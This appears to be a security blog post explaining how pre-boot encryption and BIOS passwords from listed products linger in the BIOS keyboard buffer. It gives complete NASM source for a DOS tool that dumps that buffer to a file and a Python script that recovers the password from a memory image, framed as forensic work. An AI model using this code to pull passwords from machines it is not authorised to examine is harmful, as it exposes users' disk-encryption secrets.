Duplicating Volatility Bioskbd Command Function on Live Windows Systems

I didn't realize there was still much demand for pulling passwords from BIOS keyboard buffers until I saw that a "bioskbd" command had been added to the new 1.4 version of the Volatility Framework.

Examples of products that leak passwords in this manner:
Microsoft Bitlocker/Vista (SP0)
TrueCrypt 5.0 (possibly older versions also)
SafeBoot Device Encryption v4, Build 4750 and below
Secu Star’s DriveCrypt Plus Pack v3.9 (possibly other versions also)
DiskCryptor 0.2.6 for Windows (possibly other versions also)
Lenovo 7CETB5WW v2.05 (10/13/2006) BIOS (possibly others too)
Intel Corp PE94510M.86A.0050.2007.0710.1559 (07/10/2007) BIOS (possibly others too)
Hewlett-Packard 68DTT Ver. F.0D BIOS (possibly others too)

Each of these products reads its pre-boot password through the BIOS keystroke services and leaves it sitting in the BIOS keyboard buffer, a 16-slot ring of (ASCII, scan code) word pairs at 0040:001E (physical address 0x41E), instead of overwriting it before handing control to the operating system. The BIOS itself only moves the head and tail pointers and never clears a consumed slot, so on a live system running one of the affected products the password can be recovered simply by reading those 32 bytes. Below is NASM source for a small 16-bit DOS .COM tool that does exactly that and writes the result to a file; assemble it with "nasm -f bin passleak.asm -o passleak.com". It needs a 16-bit DOS environment to run (real DOS, or NTVDM on 32-bit Windows; 64-bit Windows cannot run 16-bit code), and it only sees what the BIOS left behind: if the password was longer than 16 characters, only the last 16 survive.

org 100h                        ; 16-bit DOS .COM: CS=DS=ES=SS=PSP segment on entry

section .text

_start:
mov ah, 09h
mov dx, welcome
int 0x21                        ; DOS: print the '$'-terminated greeting

mov ax, 0x40                    ; BIOS data area segment; 0040:001E is the keyboard ring buffer
mov ds, ax
mov si, 0x1e                    ; first slot of the ring
mov di, buffer                  ; destination in our own segment (CS)
mov cx, 0x10                    ; 16 slots of 2 bytes: ASCII code in the low byte, scan code in the high byte

leakloop:
mov ax, [ds:si]                 ; load one slot (AL = ASCII, AH = scan code)
xor ah, ah                      ; keep only the ASCII byte

cmp al, 0x20                    ; control characters and empty slots become a space
jae keepcopying
mov al, 0x20

keepcopying:
cmp al, 0x7e                    ; 0x7e ('~') is still printable; anything above it becomes a space
jbe keepcopying2
mov al, 0x20

keepcopying2:
mov [cs:di], al                 ; store one byte (the original stored the whole word and relied on the next pass to overwrite the zero)
inc di
add si, 2                       ; next slot
loop leakloop                   ; decrement CX, repeat while it is not zero

push es                         ; ES still holds the PSP segment, which is also our data segment
pop ds

mov ah, 0x3c                    ; DOS: create/truncate file, handle returned in AX
mov dx, fname
xor cx, cx                      ; normal file attributes
int 0x21
jc done                         ; CF set: the file could not be created, just exit
mov bx, ax                      ; file handle (re-opening the file with 3Dh, as the original did, is unnecessary)

mov ah, 0x40                    ; DOS: write CX bytes from DS:DX to handle BX
mov cx, msglen
mov dx, Msg
int 0x21

mov ah, 0x3e                    ; DOS: close the handle (the original never closed it)
int 0x21

done:
mov ax, 0x4c00                  ; DOS: terminate with return code 0 (the original's 'mov ax,0x4c' called function 00h instead)
int 0x21

section .data

welcome db 13,10
db 'Dumping password to file : PASSLEAK.TXT',13,10
db 'Look in PASSLEAK.TXT to see what was found in your BIOS keyboard buffer.',13,10
db 'This is a circular buffer, so your password might wrap around to the front.',13,10
db 'It should have the last 16 printable characters typed at the login screen.',13,10
db '$'

fname db 'Passleak.txt',0        ; ASCIIZ name for function 3Ch
Msg: db 'BIOS keyboard buffer contains: '
buffer: times 16 db 'X'          ; filled in by leakloop
db 13,10
msglen equ $ - Msg               ; bytes written to the file: label + 16 characters + CRLF
;EOF
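The Volatility bioskbd command performs the same walk against a physical memory image instead of a live DOS session. The following is an added example written for this page, not code from the original post or from Volatility: it pulls the BIOS data area fields out of a raw image (a constructed stand-in image is built inline; it is not a real capture) and, beyond what the DOS tool above does, uses the ring's tail pointer at 0040:001C to put the characters back into typing order, so a password that wrapped around to the front does not have to be unrotated by eye. The offsets used (head 0x41A, tail 0x41C, ring 0x41E, ring bounds at 0x480/0x482) are the standard BIOS data area layout; the scan codes in the constructed sample are set to zero for brevity.

```python
# Added example, not code from the original post or from Volatility: the BIOS
# keyboard ring walk applied to a raw physical memory image, plus a
# reconstruction of typing order from the tail pointer.  The image used
# below is a constructed stand-in, not a real capture.
#
# BIOS data area fields assumed (segment 0040h = physical 0x400):
#   0x41A word  head: offset of the next slot INT 16h will hand out
#   0x41C word  tail: offset of the next free slot INT 09h will fill
#   0x41E 32 B  16 slots of (ASCII code, scan code); 0x480/0x482 hold the
#               ring bounds, normally 0x1E and 0x3E
# INT 16h only advances head and never clears a consumed slot, which is why
# a pre-boot password survives here after the prompt has read it.
import struct

SEG_BASE = 0x400        # physical address of segment 0040h
BDA_HEAD = 0x41A
BDA_TAIL = 0x41C
BDA_RING = 0x480        # start and end offsets of the ring, one word each
DEFAULT_RING = (0x1E, 0x3E)


def printable(code):
    """Same filter as the DOS tool: keep 0x20..0x7E, blank everything else."""
    return chr(code) if 0x20 <= code <= 0x7E else ' '


def read_slots(image):
    """The 16 (ascii, scancode) pairs in storage order."""
    raw = image[SEG_BASE + DEFAULT_RING[0]:SEG_BASE + DEFAULT_RING[1]]
    return [(raw[i], raw[i + 1]) for i in range(0, len(raw), 2)]


def dump_storage_order(image):
    """Printable view of the ring as laid out in memory (may be rotated)."""
    return ''.join(printable(a) for a, _ in read_slots(image))


def ring_bounds(image):
    """Ring bounds from 0x480/0x482, or the defaults if those look trashed."""
    start, end = struct.unpack_from('<HH', image, BDA_RING)
    ok = DEFAULT_RING[0] <= start < end <= 0x100 and (end - start) % 2 == 0
    return (start, end) if ok else DEFAULT_RING


def dump_typing_order(image):
    """Walk backwards from tail, wrapping at the ring start, then reverse.
    Returns None when tail is not a valid slot offset (BDA overwritten, or the
    image is not from a BIOS-booted machine); fall back to storage order then."""
    start, end = ring_bounds(image)
    tail = struct.unpack_from('<H', image, BDA_TAIL)[0]
    if not (start <= tail < end) or (tail - start) % 2:
        return None
    chars, pos = [], tail
    for _ in range((end - start) // 2):
        pos = pos - 2 if pos > start else end - 2
        chars.append(printable(image[SEG_BASE + pos]))
    return ''.join(reversed(chars))


# --- constructed sample image: simulate the BIOS side so the layout is exact ---

def bios_put_key(image, ascii_code, scan_code):
    """INT 09h behaviour: store at tail, advance tail with wrap; a full ring
    (tail would meet head) drops the key, so 16 slots hold at most 15 keys."""
    start, end = ring_bounds(image)
    head, tail = struct.unpack_from('<HH', image, BDA_HEAD)
    nxt = tail + 2 if tail + 2 < end else start
    if nxt == head:
        return False
    struct.pack_into('<BB', image, SEG_BASE + tail, ascii_code, scan_code)
    struct.pack_into('<H', image, BDA_TAIL, nxt)
    return True


def bios_get_key(image):
    """INT 16h AH=00h behaviour: return the slot at head and advance head.
    The slot contents are left in place."""
    start, end = ring_bounds(image)
    head, tail = struct.unpack_from('<HH', image, BDA_HEAD)
    if head == tail:
        return None
    key = struct.unpack_from('<BB', image, SEG_BASE + head)
    struct.pack_into('<H', image, BDA_HEAD, head + 2 if head + 2 < end else start)
    return key


def build_sample_image(typed):
    """Zero-filled stand-in for a physical image (constructed, not a real dump)
    after a pre-boot prompt has read every key of `typed`.  Scan codes are 0
    for brevity; a real BIOS stores the make code in the high byte."""
    image = bytearray(0x500)
    struct.pack_into('<HH', image, BDA_HEAD, DEFAULT_RING[0], DEFAULT_RING[0])
    struct.pack_into('<HH', image, BDA_RING, *DEFAULT_RING)
    for ch in typed:
        bios_put_key(image, ord(ch), 0)
        bios_get_key(image)          # the prompt consumes each key as it arrives
    return image


if __name__ == '__main__':
    img = build_sample_image('hunter2-Str0ngPass!\r')   # 20 keys: the first 4 are overwritten
    print('ring reports empty:', bios_get_key(img) is None)
    print('storage order :', repr(dump_storage_order(img)))
    print('typing order  :', repr(dump_typing_order(img)))
```

In the sample, head equals tail afterwards, so the BIOS would report the ring as empty, yet every slot still holds a character; that is exactly the condition the advisories describe. The storage-order string starts with the tail end of the password ("ss! er2-Str0ngPa"), while the tail-pointer walk returns "er2-Str0ngPass! " with the CR blanked. The un-rotation only works while the BDA pointers themselves are intact; if the operating system has overwritten that memory the function returns None and the storage-order dump, which is what the DOS tool above produces, is all that is left.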

References:
http://www.ivizsecurity.com/security-advisory-iviz-sr-08010.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0807.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0806.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0805.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0804.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0803.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0802.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0801.html

email: david @ sharpesecurity.com
website: www.sharpesecurity.com
Twitter: twitter.com/sharpesecurity
Twitter: twitter.com/patchmanagement
